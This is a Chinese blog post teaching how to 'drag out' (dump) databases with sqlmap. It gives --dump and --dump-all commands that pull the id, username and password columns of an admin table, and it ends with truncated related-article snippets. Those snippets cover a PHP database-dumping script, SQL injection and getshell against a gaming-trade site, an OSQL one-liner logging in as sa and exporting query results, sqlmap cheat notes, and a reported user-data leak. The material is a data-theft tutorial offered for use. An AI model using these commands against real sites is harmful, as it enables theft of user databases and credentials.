SQLMAP脱裤

之前就有一个朋友问,咋使用sqlmap脱裤。然后我丢了一个参数给他,他好像懵逼懵逼的。今天又有一个哥们儿在群里问,行吧。就直接教一下。

其实很简单。

--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"

脱出数据如下所示:

仅一个文件。就是你选定了的数据。

那么我们加all呢?(PS:此时可以把那些字段都给去掉。)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all

可见如下是三个文件。

这三个文件是啥呢?解惑便是下图所示。

时间: 2024-10-11 19:51:13

SQLMAP脱裤的相关文章

PHP wget 增强脱裤脚本(PDO MYSQL)

脚本参考了 LCX Gavin2位前辈的帖子.在此表示非常的感谢. https://www.t00ls.net/thread-26740-1-1.html https://www.t00ls.net/thread-26791-1-1.html 说明:脚本支持PDO和MYSQL 2种方式 优先使用PDO .如果服务器不支持PDO  就选择MYSQL 方式. 个人认为  PDO 的好处有效率高  代码简洁 通用性好  这代码稍作改动就可以拿去脱mssql 不过用php和mssql组合的应该不多- -

仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填好了之后就去他就会去购买,然后仔细看了一下平台,获取了源代码后看了一下~呵呵,漏洞还是有不 少的~ 仿5173网游交易平台游戏交易平台存在注入与getshell漏洞,可直接拖掉玩家数据~     发乌云上乌云不收,所以没事就发zone里给大家玩玩.其实这系统还是蛮多漏洞的,我最痛恨骗子了,大家能搞几

OSQL.EXE 命令行下脱裤mssql

cd C:\Program Files\Microsoft SQL Server\100\Tools\Binn\ OSQL.EXE -S "localhost" -U "sa" -P "123456789"  -q "select [name] from [sysdatabases] order by [name]"  查询所有库 ------fwwebmastermodelmsdboadataReportServerRepo

被脱裤也不怕,密码安全可以这样保障【转】

在前一篇文章<设计安全的账号系统的正确姿势>中,主要提出了一些设计的方法和思路,并没有给出一个更加具体的,可以实施的安全加密方案.经过我仔细的思考并了解了目前一些方案后,我设计了一个自认为还比较安全的安全加密方案.本文主要就是讲述这个方案,非常欢迎和期待有读者一起来讨论. 首先,我们明确一下安全加密方案的终极目标: 即使在数据被拖库,代码被泄露,请求被劫持的情况下,也能保障用户的密码不被泄露. 说具体一些,我们理想中的绝对安全的系统大概是这样的: 首先保障数据很难被拖库. 即使数据被拖库,攻击

命令行下连接SQLServer小工具(脱裤必备)

osql -S 192.168.2.xx -Ufxxxx -PHxxxxx  -Q "use xxx;select  * from xx"  -o %temp%/xx.txt -w  20000

大麦网疑遭“脱裤” 600余万用户信息被售卖

乌云漏洞平台报告,一些黑产交易论坛正售卖传播一份大麦网用户数据库,其中包括账号邮箱,密码hash等信息.经过测试,泄漏的账号均可成功登录,大麦网目前已确认该问题.另有用户反映通过大麦预订的演出票未取票订单信息已成空白,常用大麦的朋友要小心了! 白帽子黑客起初发现有大麦网用户数据库在黑产论坛被公开售卖,于是对泄露的用户数据进行验证,发现相邻账号的用户ID也是连续的,并均可登录.因此,丛技术的角度可以初步证明本次大麦网的数据泄露有很大拖库嫌疑(网站用户注册信息数据库被黑客窃取). 目前这一漏洞问题已

sqlmap 命令笔记

基础命令 注入 MySQL mssql access 直接爆表.然后你懂的BT5里面的话前面就要加pythonsqlmap.py -u url --dbs //爆数据库sqlmap.py -u url --current-db //爆当前库sqlmap.py -u url --current-user //爆当前用户sqlmap.py -u url --users 查看用户权限sqlmap.py -u url --tables -D 数据库 //爆表段sqlmap.py -u url --col

SQLMAP大全

转自:http://blog.csdn.net/zsf1235/article/details/50974194 本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下:   cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables                sqlmap.py -u

『安全工具』注入神器SQLMAP

原文:『安全工具』注入神器SQLMAP Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注入神器 0x 01 注入原理 *****************************************开始分割线***************************************** 时间原因,这段内容就先不写了 就是因为